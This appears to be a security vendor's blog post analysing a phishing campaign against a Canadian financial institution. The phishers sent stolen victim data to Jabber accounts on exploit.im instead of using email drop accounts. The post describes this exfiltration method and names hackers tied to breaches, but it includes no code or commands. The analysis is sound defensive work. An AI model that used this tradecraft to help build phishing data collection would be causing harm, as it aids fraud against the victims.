While analyzing a recent phishing campaign targeting a Canadian financial institution, we came across an interesting technique used by the phishers to exfiltrate the personal and financial data obtained from victims. Historically, phishers have most commonly used disposable email accounts to collect compromised information from phishing campaigns. Sending compromised data to a temporary email account has likely been adopted by the phishing community because email accounts are easily accessible, and mailing scripts can be used or built with very little PHP knowledge. Instead of forwarding phished data to an email account, we have also seen phishers that have stored victim information on the compromised phishing server, which allows them to consolidate all of the data into one file rather than having to sift through individual emails for each piece of information.
Most Common Drop Email Account Providers (2016 Phishing Trends & Intelligence Report)
Instead of using an email drop account, the scammers in this recent campaign have used Jabber, an instant messaging service based on XMPP protocol, to collect phished victim information. XMPP is an open source protocol that is more decentralized than traditional email. Rather than having all communications go through a central server, like is the case with email or traditional instant messaging services, Jabber servers are set up independently from one another. Because Jabber servers are independent from one another and can be set up by anyone for individual use, it allows for greater control of communication and enhanced privacy since messages only travel between the servers being used in a conversation rather than getting routed through a central location.
The scammers in this campaign used accounts created on the exploit.im Jabber server to receive phished information.
Beginning of Function Used to Send Phished Data via Jabber
The use of exploit.im is interesting because, although it used to be a rather popular Jabber server for hackers, it started going out of favor in late-2014 after it was rumored to have been compromised. Still, exploit.im has been recently connected to some high profile hackers, such as “Tessa88@exploit.im,” who has been linked to the data breaches of LinkedIn, MySpace, Twitter, Tumbler, and VK, and Rory Guidry (aka firstname.lastname@example.org), who was arrested as part of the Darkode forum takedown.
It is unknown why the phishers in this campaign have used Jabber as the exfiltration method. It’s a curious choice since, absent the use of encryption and without having control of the Jabber server, there is nothing stopping the administrator of the server from scanning and logging the contents of the messages being sent that contain the compromised information. It does show, however, that phishers are continually developing new methods to facilitate their malicious activities.
Download: The CISO's Guide to Spear Phishing Defense
Download: Phishing Trends & Intelligence Report: Hacking the Human
Webcast: Strategic Framework for Spear Phishing Defense